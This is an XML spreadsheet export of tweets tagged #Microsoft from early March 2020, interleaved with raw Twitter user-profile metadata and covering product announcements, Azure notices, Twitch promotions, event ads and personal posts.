    <t>{'id': 857587885268242432, 'id_str': '857587885268242432', 'name': 'Laurent Pierre Jr', 'screen_name': 'LaurentPierreJr', 'location': 'Atlanta, GA - Boca Raton, FL', 'description': 'General Manager @Microsoft Azure CXP | Creating Customer Experiences &amp; Journeys | Proud Husband to SuperWife-SuperMom. Proud Papa | Imagine the Possibilities', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1445, 'friends_count': 1651, 'listed_count': 21, 'created_at': 'Thu Apr 27 13:30:59 +0000 2017', 'favourites_count': 2758, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 4894, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/958509166322044928/jkMtC5Wa_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/958509166322044928/jkMtC5Wa_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/857587885268242432/1577035474',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</si>
  <si>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03:50:03 +0000 2020</t>
  </si>
  <si>
    <t>Ya Xu, LinkedIn
on theCUBE from Stanford Women in Data Science (WiDS) 2020 
https://t.co/pTNsDMW0h8
@LinkedIn #LinkedIn @Microsoft #Microsoft @Stanford #Stanford 
#theCUBE #WomenInTech @WiDS_Conference #WiDS2020 https://t.co/DDQqVkGLMD</t>
  </si>
  <si>
    <t>Tue Mar 03 03:47:57 +0000 2020</t>
  </si>
  <si>
    <t>Windows 10 has come far and as the newest OS from Microsoft is quite modern and sleek.
Read more  https://t.co/LbSwec5m7J
#Windows7 #Windows10 #Microsoft https://t.co/l1LTkFLgfa</t>
  </si>
  <si>
    <t>Tue Mar 03 03:47:14 +0000 2020</t>
  </si>
  <si>
    <t>SAP Plant Maintenance(PM) Module Online Classes 
https://t.co/p6CIhpv4LD
#Google #BehindTheSlides #GoogleSlides #PowerPoint #CyberSecurity #Intel #Microsoft #Ad #Windows10 #NintendoSwitch #Xbox #javascript30 #html5 #css3 #100DaysOfCode #webdev #100DaysOfMLCode #udemy #UdeChile</t>
  </si>
  <si>
    <t>{'id': 1139531075703590917, 'id_str': '1139531075703590917', 'name': 'BlackfreeNiken', 'screen_name': 'BlackfreeNiken', 'location': '', 'description': 'share about #100DaysOfCode', 'url': 'https://t.co/JswOhFhJ0r', 'entities': {'url': {'urls': [{'url': 'https://t.co/JswOhFhJ0r', 'expanded_url': 'https://www.couponed12.com', 'display_url': 'couponed12.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 123, 'friends_count': 126, 'listed_count': 7, 'created_at': 'Fri Jun 14 13:52:34 +0000 2019', 'favourites_count': 1, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 910, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1198566533317844997/LJzP5iY7_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1198566533317844997/LJzP5iY7_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1139531075703590917/1574595547',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</si>
  <si>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03:46:03 +0000 2020</t>
  </si>
  <si>
    <t>Register today for @Axway and @Microsoft webinar on February 27th (French) &amp;amp; March 5th (English version). Discover how Axway #AMPLIFY API Management on @azure benefits your company. #apimanagement #hybrid #microsoft https://t.co/3xDt9uaybj https://t.co/cXYqwycdGj</t>
  </si>
  <si>
    <t>{'id': 2960802961, 'id_str': '2960802961', 'name': 'Adrian Phang', 'screen_name': 'APhang526842', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 17, 'friends_count': 66, 'listed_count': 0, 'created_at': 'Tue Jan 06 13:41:57 +0000 2015', 'favourites_count': 9, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/552460712199479296/dHCncfAc_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/552460712199479296/dHCncfAc_normal.png',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</si>
  <si>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03:44:22 +0000 2020</t>
  </si>
  <si>
    <t>What will you create? #microsoft #quantumcom #solutions
https://t.co/1EmInR5trm https://t.co/jGDN7qY9oK</t>
  </si>
  <si>
    <t>{'id': 36789508, 'id_str': '36789508', 'name': 'Miguel Calderon', 'screen_name': 'MiguelCalderonX', 'location': 'Washington', 'description': 'Technical Recruiter with emphasis in Mobile, IT and Engineering. Please look at my LinkedIn profile. http://t.co/uykafW58', 'url': 'https://t.co/gm6WVcoeoE', 'entities': {'url': {'urls': [{'url': 'https://t.co/gm6WVcoeoE', 'expanded_url': 'http://www.microsoft.com', 'display_url': 'microsoft.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'http://t.co/uykafW58', 'expanded_url': 'http://www.linkedin.com/in/miguelcalderon25', 'display_url': 'linkedin.com/in/miguelcaldeâ€¦', 'indices': [101, 121]}]}}, 'protected': False, 'followers_count': 545, 'friends_count': 1963, 'listed_count': 26, 'created_at': 'Thu Apr 30 22:14:34 +0000 2009', 'favourites_count': 3, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 6534,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'http://pbs.twimg.com/profile_images/715004229803442176/jHQGWH_4_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/715004229803442176/jHQGWH_4_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/36789508/1467244710',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</si>
  <si>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03:43:51 +0000 2020</t>
  </si>
  <si>
    <t>First Day as Twitch Affiliate! Sub Goal: 1/10  https://t.co/yCF3ANZeTs #gaming #pc #pcgaming #microsoft #epic #squads #twitch #twitchtv #twitchaffiliate #twitchstreamer #hangout #chill #fun #twitchgamer #free</t>
  </si>
  <si>
    <t>Tue Mar 03 03:39:00 +0000 2020</t>
  </si>
  <si>
    <t>#DataAnalytics &amp;amp; #Management Training @Exedin1 
Master your data to achieve more with #Microsoft  https://t.co/kPc1B5gIiS</t>
  </si>
  <si>
    <t>Tue Mar 03 03:36:34 +0000 2020</t>
  </si>
  <si>
    <t>Installed #Microsoft #edge browser in Mac. Need to weigh it's pros and cons.</t>
  </si>
  <si>
    <t>{'id': 40827389, 'id_str': '40827389', 'name': 'Binu Jayaraj', 'screen_name': 'binujayaraj', 'location': 'Bangalore', 'description': 'A gadget freak, a vehicle enthusiast and a project delivery strategist by profession.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 123, 'friends_count': 156, 'listed_count': 12, 'created_at': 'Mon May 18 06:31:36 +0000 2009', 'favourites_count': 45, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 4934,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'http://pbs.twimg.com/profile_images/216931490/India_flag_background_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/216931490/India_flag_background_normal.jpg',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</si>
  <si>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Tue Mar 03 03:36:00 +0000 2020</t>
  </si>
  <si>
    <t>Azure News:
Service Management REST APIs and support will be retired on November 1, 2021
To continue using Service Bus, Relay, and Event Hubs, please move your APIs to Azure Resource Manager.
https://t.co/loRxoRITgR
#azure #microsoft</t>
  </si>
  <si>
    <t>Azure News:
Migrate your IaaS resources to Azure Resource Manager by March 1, 2023
We encourage you to make the switch to Azure Resource Manager to take advantage of the many feature enhancements in ARM.
https://t.co/8kqYtbNRtf
#azure #microsoft</t>
  </si>
  <si>
    <t>Tue Mar 03 03:31:45 +0000 2020</t>
  </si>
  <si>
    <t>#M365Roadmap change:Profile Card Customization through Microsoft Graph Beta
#Microsoft
Prop:RM Release
old:Q3 CY2020
new:April CY2020</t>
  </si>
  <si>
    <t>Tue Mar 03 03:30:12 +0000 2020</t>
  </si>
  <si>
    <t>How #Security Leads at Starbucks and #Microsoft Prepare for #Breaches https://t.co/skkYKjSvbu #DarkReading</t>
  </si>
  <si>
    <t>Tue Mar 03 03:25:37 +0000 2020</t>
  </si>
  <si>
    <t>.@TwitterGaming .@Twitter .@ReCoreGame .@Xbox 
Its been a while since I played ReCore, nice to get back into it again.
#ReCore #Microsoft https://t.co/r7ZnZmxjYs</t>
  </si>
  <si>
    <t>{'id': 1159455182113034241, 'id_str': '1159455182113034241', 'name': 'Serifer Gaming', 'screen_name': 'GamingSerifer', 'location': 'Australia', 'description': 'Artist â€¢ Gamer â€¢ Miniature Pottery â€¢ Music â€¢ Anime â€¢ MangaðŸ’»ðŸŽ®ðŸŽ™ðŸŽ§I enjoy making car vinyl designs in Forza Horizon and mega builds in Minecraft mainly. (Â´âˆ€ï½€*)', 'url': 'https://t.co/psiC6hJEHy', 'entities': {'url': {'urls': [{'url': 'https://t.co/psiC6hJEHy', 'expanded_url': 'https://www.facebook.com/SeriferGaming/', 'display_url': 'facebook.com/SeriferGaming/', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 22, 'friends_count': 249, 'listed_count': 1, 'created_at': 'Thu Aug 08 13:23:51 +0000 2019', 'favourites_count': 2686, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 490, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1159457609239285761/N0M9ZAnd_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1159457609239285761/N0M9ZAnd_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1159455182113034241/1570422616',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</si>
  <si>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03:19:11 +0000 2020</t>
  </si>
  <si>
    <t>DriveNavRT DriveNav: FreePoint - we are expecting a full house at #Microsoft #FPAC2020 in #Mississauga
#MSDyn365 #MSDyn365BC #Apps #MSApps
#Toront...</t>
  </si>
  <si>
    <t>Tue Mar 03 03:09:03 +0000 2020</t>
  </si>
  <si>
    <t>In a sense, #pycon already killed itself when it sold to #microsoft and started pushing #proprietarysoftware and #surveillance of Microsoft... in exchange for this unbridled #bribery</t>
  </si>
  <si>
    <t>Tue Mar 03 03:05:12 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft identity acronymswhat do they mean and how do they relate to each other? https://t.co/hOAxmTbTtr #microsoft #feedly</t>
  </si>
  <si>
    <t>Tue Mar 03 03:02:13 +0000 2020</t>
  </si>
  <si>
    <t>From enhanced services to optimized defense and intelligence operations, read how #Microsoft for Government is empowering public institutions worldwide. https://t.co/WN2SXQOGm2</t>
  </si>
  <si>
    <t>Tue Mar 03 03:01:54 +0000 2020</t>
  </si>
  <si>
    <t>Data-driven transformation is a journey that requires adaptability. With #Microsoft #Azure, Samsys Group delivers the data, security and AI you need to build an agile data estate. https://t.co/m9t4D6KxDD</t>
  </si>
  <si>
    <t>{'id': 1031756433748946944, 'id_str': '1031756433748946944', 'name': 'Samuel', 'screen_name': 'Samsysgroup', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 3, 'friends_count': 3, 'listed_count': 0, 'created_at': 'Tue Aug 21 04:14:37 +0000 2018', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 476, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1070148746753728512/U0uNKwvZ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1070148746753728512/U0uNKwvZ_normal.jpg',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</si>
  <si>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03:01:37 +0000 2020</t>
  </si>
  <si>
    <t>Minecraft: Education Edition from #Microsoft makes learning fun and improves students' critical thinking. Pretty cool, right? Check out this article for more on how we can help engage your students and ignite their #passionforlearning. https://t.co/WrZ0CQMeFA</t>
  </si>
  <si>
    <t>Tue Mar 03 03:00:32 +0000 2020</t>
  </si>
  <si>
    <t>Avanade offers #Microsoft #Dynamics AX Development Services covering Mobile Apps, Integraions, ERP and CRM --&amp;gt; https://t.co/NCQlRxfeVW &amp;lt;-- March 02, 2020 at 10:00PM</t>
  </si>
  <si>
    <t>Tue Mar 03 02:57:59 +0000 2020</t>
  </si>
  <si>
    <t>Modern Day Slavery brought to you by #Nike, #Adidas, #Gap, #TommyHilfiger, #Uniqlo, #Apple, #Microsoft, #BMW, #GM, #Jaguar, #Daimler Benz, #Google, #Samsung, #Huawei and 69 others. 
Xinjiang Aid - We Supply Uighurs through Online Booking
 via @forbes 
https://t.co/Yhsxeemy1h</t>
  </si>
  <si>
    <t>{'id': 1178850923063300098, 'id_str': '1178850923063300098', 'name': 'Mad Q', 'screen_name': 'mad_mq', 'location': 'Sherman Oaks, CA', 'description': 'random', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1, 'friends_count': 1, 'listed_count': 0, 'created_at': 'Tue Oct 01 01:56:11 +0000 2019', 'favourites_count': 2, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 18, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1235392624770478080/DDrHgQ3R_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235392624770478080/DDrHgQ3R_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1178850923063300098/1582436340',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</si>
  <si>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02:56:52 +0000 2020</t>
  </si>
  <si>
    <t>"While it can be tempting to postpone plans until everyone can get together, companies here are finding ways to keep things moving forward." #keepitmoving #microsoft #collaboration https://t.co/3Z0mM2cyEs #MSFTAdvocate</t>
  </si>
  <si>
    <t>Tue Mar 03 02:55:38 +0000 2020</t>
  </si>
  <si>
    <t>Innovating to drive the future of intelligent retail
#Retail #Microsoft
https://t.co/BUWhwn8Mqo</t>
  </si>
  <si>
    <t>Tue Mar 03 02:55:36 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft will be carbon negative by 2030
#Environment #Microsoft
https://t.co/eZofWaaTFJ</t>
  </si>
  <si>
    <t>Tue Mar 03 02:55:34 +0000 2020</t>
  </si>
  <si>
    <t>From tech adoption to tech creation: Customers across industries are using advanced cloud and AI tools to build their own digital solutions
#Microsoft Power Platform #Microsoft
https://t.co/6SJe2eLBby</t>
  </si>
  <si>
    <t>Tue Mar 03 02:55:33 +0000 2020</t>
  </si>
  <si>
    <t>From tech adoption to tech creation: Customers across industries are using advanced cloud and AI tools to build their own digital solutions
#IoT #Microsoft
https://t.co/6SJe2eLBby</t>
  </si>
  <si>
    <t>Tue Mar 03 02:55:32 +0000 2020</t>
  </si>
  <si>
    <t>From tech adoption to tech creation: Customers across industries are using advanced cloud and AI tools to build their own digital solutions
#Azure #Microsoft
https://t.co/6SJe2eLBby</t>
  </si>
  <si>
    <t>From tech adoption to tech creation: Customers across industries are using advanced cloud and AI tools to build their own digital solutions
#AI #Microsoft
https://t.co/6SJe2eLBby</t>
  </si>
  <si>
    <t>Tue Mar 03 02:55:31 +0000 2020</t>
  </si>
  <si>
    <t>From tech adoption to tech creation: Customers across industries are using advanced cloud and AI tools to build their own digital solutions
#The Official Microsoft Blog #Microsoft
https://t.co/6SJe2eLBby</t>
  </si>
  <si>
    <t>Tue Mar 03 02:55:30 +0000 2020</t>
  </si>
  <si>
    <t>We are the dream of our ancestors
#Black History Month #Microsoft
https://t.co/PYx8yDpyDG</t>
  </si>
  <si>
    <t>Tue Mar 03 02:55:29 +0000 2020</t>
  </si>
  <si>
    <t>We are the dream of our ancestors
#Featured #Microsoft
https://t.co/PYx8yDpyDG</t>
  </si>
  <si>
    <t>Tue Mar 03 02:55:28 +0000 2020</t>
  </si>
  <si>
    <t>Black History Month: Building a better future together
#diversity #Microsoft
https://t.co/3KnEbELZxQ</t>
  </si>
  <si>
    <t>Tue Mar 03 02:55:27 +0000 2020</t>
  </si>
  <si>
    <t>Black History Month: Building a better future together
#Blacks at Microsoft #Microsoft
https://t.co/3KnEbELZxQ</t>
  </si>
  <si>
    <t>Black History Month: Building a better future together
#Black History Month #Microsoft
https://t.co/3KnEbELZxQ</t>
  </si>
  <si>
    <t>Tue Mar 03 02:55:25 +0000 2020</t>
  </si>
  <si>
    <t>U.S. Air Force and Microsoft partner to empower airmen with modern IT
#U.S. Air Force #Microsoft
https://t.co/hFpf45JkH0</t>
  </si>
  <si>
    <t>U.S. Air Force and Microsoft partner to empower airmen with modern IT
#Microsoft Teams #Microsoft
https://t.co/hFpf45JkH0</t>
  </si>
  <si>
    <t>Tue Mar 03 02:55:24 +0000 2020</t>
  </si>
  <si>
    <t>U.S. Air Force and Microsoft partner to empower airmen with modern IT
#Azure Government #Microsoft
https://t.co/hFpf45JkH0</t>
  </si>
  <si>
    <t>U.S. Air Force and Microsoft partner to empower airmen with modern IT
#The Official Microsoft Blog #Microsoft
https://t.co/hFpf45JkH0</t>
  </si>
  <si>
    <t>U.S. Air Force and Microsoft partner to empower airmen with modern IT
#Featured #Microsoft
https://t.co/hFpf45JkH0</t>
  </si>
  <si>
    <t>Tue Mar 03 02:55:23 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft for Startups unlocks $1 billion in sales opportunities for B2B startups; adds GitHub and Microsoft Power Platform
#Microsoft for Startups #Microsoft
https://t.co/bVnRQcyB7l</t>
  </si>
  <si>
    <t>Tue Mar 03 02:55:22 +0000 2020</t>
  </si>
  <si>
    <t>Tue Mar 03 02:55:21 +0000 2020</t>
  </si>
  <si>
    <t>Black History Month: Leaning In
#Microsoft Life #Microsoft
https://t.co/SkPzpqi2nr</t>
  </si>
  <si>
    <t>Tue Mar 03 02:55:20 +0000 2020</t>
  </si>
  <si>
    <t>Black History Month: Leaning In
#The Official Microsoft Blog #Microsoft
https://t.co/SkPzpqi2nr</t>
  </si>
  <si>
    <t>Tue Mar 03 02:55:19 +0000 2020</t>
  </si>
  <si>
    <t>Delivering on the promise of security AI to help defenders protect todays hybrid environments
#Security #Microsoft
https://t.co/GxGEKoREjW</t>
  </si>
  <si>
    <t>Tue Mar 03 02:55:18 +0000 2020</t>
  </si>
  <si>
    <t>Delivering on the promise of security AI to help defenders protect todays hybrid environments
#RSA 2020 #Microsoft
https://t.co/GxGEKoREjW</t>
  </si>
  <si>
    <t>Delivering on the promise of security AI to help defenders protect todays hybrid environments
#cybersecurity #Microsoft
https://t.co/GxGEKoREjW</t>
  </si>
  <si>
    <t>Tue Mar 03 02:55:17 +0000 2020</t>
  </si>
  <si>
    <t>Delivering on the promise of security AI to help defenders protect todays hybrid environments
#The Official Microsoft Blog #Microsoft
https://t.co/GxGEKoREjW</t>
  </si>
  <si>
    <t>Delivering on the promise of security AI to help defenders protect todays hybrid environments
#Featured #Microsoft
https://t.co/GxGEKoREjW</t>
  </si>
  <si>
    <t>Tue Mar 03 02:55:16 +0000 2020</t>
  </si>
  <si>
    <t>Creating a world of good: Microsoft launches the Global Social Entrepreneurship program
#startups #Microsoft
https://t.co/Dyk0ZV1Z0h</t>
  </si>
  <si>
    <t>Tue Mar 03 02:55:15 +0000 2020</t>
  </si>
  <si>
    <t>Creating a world of good: Microsoft launches the Global Social Entrepreneurship program
#Global Social Entrepreneurship #Microsoft
https://t.co/Dyk0ZV1Z0h</t>
  </si>
  <si>
    <t>Creating a world of good: Microsoft launches the Global Social Entrepreneurship program
#The Official Microsoft Blog #Microsoft
https://t.co/Dyk0ZV1Z0h</t>
  </si>
  <si>
    <t>Tue Mar 03 02:55:14 +0000 2020</t>
  </si>
  <si>
    <t>Creating a world of good: Microsoft launches the Global Social Entrepreneurship program
#Featured #Microsoft
https://t.co/Dyk0ZV1Z0h</t>
  </si>
  <si>
    <t>Tue Mar 03 02:54:50 +0000 2020</t>
  </si>
  <si>
    <t>As my one client is starting basic preparations for #COVID19 this article couldn't have come along at a better time!  Some most helpful tips on  "Working remotely during challenging times".
#MicrosoftTeams #Microsoft365 #Microsoft #remoteworking
https://t.co/3W6iQIIuIk</t>
  </si>
  <si>
    <t>Tue Mar 03 02:52:50 +0000 2020</t>
  </si>
  <si>
    <t>Salespeople can send LinkedIn Inmail messages or emails directly from the  @MSFTDynamics365 platform and simultaneously view LinkedIn profiles and categorise them according to customers interest and preferences.  
#Microsoft #sales #Relationshipselling #MSDyn365 https://t.co/msY8lL1gZN</t>
  </si>
  <si>
    <t>{'id': 834257743204610048, 'id_str': '834257743204610048', 'name': 'Exigo Tech Pty Ltd', 'screen_name': 'ExigoTechPtyLtd', 'location': 'Parramatta, Sydney', 'description': 'Exigo Tech specialises in providing end-to-end technology solutions to both Private SMEs and Public Enterprises.', 'url': 'https://t.co/nZl6HrWKMU', 'entities': {'url': {'urls': [{'url': 'https://t.co/nZl6HrWKMU', 'expanded_url': 'https://exigotech.com.au/', 'display_url': 'exigotech.com.au', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 27, 'friends_count': 19, 'listed_count': 0, 'created_at': 'Wed Feb 22 04:25:20 +0000 2017', 'favourites_count': 42, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 187, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/899511133119275008/0oJnHIMc_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/899511133119275008/0oJnHIMc_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/834257743204610048/1578965090',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</si>
  <si>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02:48:00 +0000 2020</t>
  </si>
  <si>
    <t>From enhanced services to optimized defense and intelligence operations, read how #Microsoft for Government is empowering public institutions worldwide. https://t.co/2F7O3krz2Y</t>
  </si>
  <si>
    <t>Tue Mar 03 02:41:39 +0000 2020</t>
  </si>
  <si>
    <t>#microsoft google and youtube and mail app and chrome and edge and feedback and playback and audio and microsoft news and main page and msn and images and browsing and browser's and internet and connection and wifi bad so much and down and broken and bad response</t>
  </si>
  <si>
    <t>Tue Mar 03 02:38:58 +0000 2020</t>
  </si>
  <si>
    <t>First Day as Twitch Affiliate! Sub Goal: 1/10  https://t.co/91xnNIiNsA #fortnite #fortnitesquad #microsoft #pc #pcgaming #live #twitch #twitchtv #twitchstreamer #TwitchAffilate #hangout #Subscribe #view #MondayMood #twitchgamer</t>
  </si>
  <si>
    <t>{'id': 960955681892380672, 'id_str': '960955681892380672', 'name': 'Eric', 'screen_name': 'm3_mercy', 'location': 'Indianapolis, IN', 'description': 'Twitch Streamer. YouTuber. Manager. Sponsored by: ðŸ’¥@therogueenergy x @roguegrips ðŸŽ® ðŸ’¥', 'url': 'https://t.co/27QUYFi7ml', 'entities': {'url': {'urls': [{'url': 'https://t.co/27QUYFi7ml', 'expanded_url': 'http://twitch.tv/eclectichd', 'display_url': 'twitch.tv/eclectichd', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 105, 'friends_count': 526, 'listed_count': 3, 'created_at': 'Tue Feb 06 19:17:43 +0000 2018', 'favourites_count': 2370, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2747, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/960957308233834496/2NFdt-rc_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/960957308233834496/2NFdt-rc_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/960955681892380672/1532454427',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</si>
  <si>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02:33:47 +0000 2020</t>
  </si>
  <si>
    <t>Continuing my play through of Life Is Strange 2. Stop by, say hi and let me know that you saw this post. https://t.co/pA09tp4HO6 
#Twitch #Streaming #games #videogames #mystery #lifeisstrange #lifeisstrange2 #xbox #microsoft #xboxone #drama #singleplayer #brothers #abuse #powers https://t.co/sQQAQBlFn3</t>
  </si>
  <si>
    <t>{'id': 22825729, 'id_str': '22825729', 'name': 'Adam Muller', 'screen_name': 'CyclopsEye1984', 'location': 'Sun Prairie, WI', 'description': 'Twitch affiliate on my way to partner. https://t.co/HlS2Os7T0k. Lost left eye to cancer. Married. Paranormal enthusiast. Taking on the world as an awkward geek.', 'url': None, 'entities': {'description': {'urls': [{'url': 'https://t.co/HlS2Os7T0k', 'expanded_url': 'http://Twitch.tv/cyclops1984', 'display_url': 'Twitch.tv/cyclops1984', 'indices': [39, 62]}]}}, 'protected': False, 'followers_count': 489, 'friends_count': 1416, 'listed_count': 12, 'created_at': 'Wed Mar 04 20:07:52 +0000 2009', 'favourites_count': 4789, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2802,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'http://pbs.twimg.com/profile_images/1089057566943076352/y4PEMdcb_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1089057566943076352/y4PEMdcb_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/22825729/1565675453', 'profile_link_color': '00B339',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</si>
  <si>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Tue Mar 03 02:32:13 +0000 2020</t>
  </si>
  <si>
    <t>How can you help students tackle the complex challenges of tomorrow? See how educators are transforming learning through student-centered approaches. #EducationalTechnology #K12 #MicrosoftEducation #Microsoft https://t.co/Hg94C1Je7X</t>
  </si>
  <si>
    <t>Tue Mar 03 02:30:25 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve">Im happy to announce that today I have officially joined #microsoft! Im really excited to work with all the great people I already got to know and the once I havent!   
life is good </t>
  </si>
  <si>
    <t>{'id': 865954005134049281, 'id_str': '865954005134049281', 'name': 'Fabian Hinsenkamp', 'screen_name': 'hinsencamp', 'location': 'Berlin', 'description': 'Senior software engineer @microsoft | ex @camunda | workflow automater ðŸš€ | aspiring #cycling addict ðŸš´\u200dâ™‚ï¸', 'url': 'https://t.co/Bgb4gAwcd8', 'entities': {'url': {'urls': [{'url': 'https://t.co/Bgb4gAwcd8', 'expanded_url': 'http://hinsencamp.com', 'display_url': 'hinsencamp.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 130, 'friends_count': 402, 'listed_count': 1, 'created_at': 'Sat May 20 15:34:58 +0000 2017', 'favourites_count': 153, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 106,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'http://pbs.twimg.com/profile_images/1018568074553851904/JultPTPi_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1018568074553851904/JultPTPi_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/865954005134049281/1495295618',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</si>
  <si>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02:28:25 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #Edge Now Lets You #Block Potentially  Unwanted Applications #PUAs automatically blocked from #downloading - are software that #degrades the overall #Windows experience after being #installed.</t>
  </si>
  <si>
    <t>Tue Mar 03 02:26:27 +0000 2020</t>
  </si>
  <si>
    <t>https://t.co/OBga2oS1OY - #Collaborate and make better decisions with https://t.co/OBga2oS1OY for #MicrosoftTeams! #technology https://t.co/W4cspXL0A7 #Microsoft #Office #Office365</t>
  </si>
  <si>
    <t>Whats New in #MicrosoftTeams | February 2020 #MicrosoftTeam #TechnologyCompany https://t.co/EVFha2Ht47 #Microsoft #Office #Office365</t>
  </si>
  <si>
    <t>Four more #reasons to love apps in #MicrosoftTeams #app https://t.co/Z5yZTTGXRj #Microsoft #Office #Office365</t>
  </si>
  <si>
    <t>Whats New in #MicrosoftTeams | January 2020 #MicrosoftTeam #Redmond https://t.co/cIpMxfO29f #Microsoft #Office #Office365</t>
  </si>
  <si>
    <t>Why wait? The top 10 #ThingsYou need to know about #upgrading from #Skype to Teams https://t.co/NCPz4TZSex #Microsoft #Office #Office365</t>
  </si>
  <si>
    <t>Watch your competitions #StockPrices: Citizen Productivity using #MicrosoftTeams + #PowerAutomate https://t.co/2MZ8aGrtqv #Microsoft #Office #Office365</t>
  </si>
  <si>
    <t>Tue Mar 03 02:26:26 +0000 2020</t>
  </si>
  <si>
    <t>4 #Tips for #WorkingFromHome with #MicrosoftTeams https://t.co/S09Xg9AyS0 #Microsoft #Office #Office365</t>
  </si>
  <si>
    <t>Tue Mar 03 02:25:26 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft planning to retire its #MCSA, #MCSD and #MCSE $certifications in June 2020 as part of its move toward 'role-based training,' #rbt</t>
  </si>
  <si>
    <t>Tue Mar 03 02:22:32 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft launches #OpenSource #privacy mapping tool.  https://t.co/3ZCzqzK7Mr</t>
  </si>
  <si>
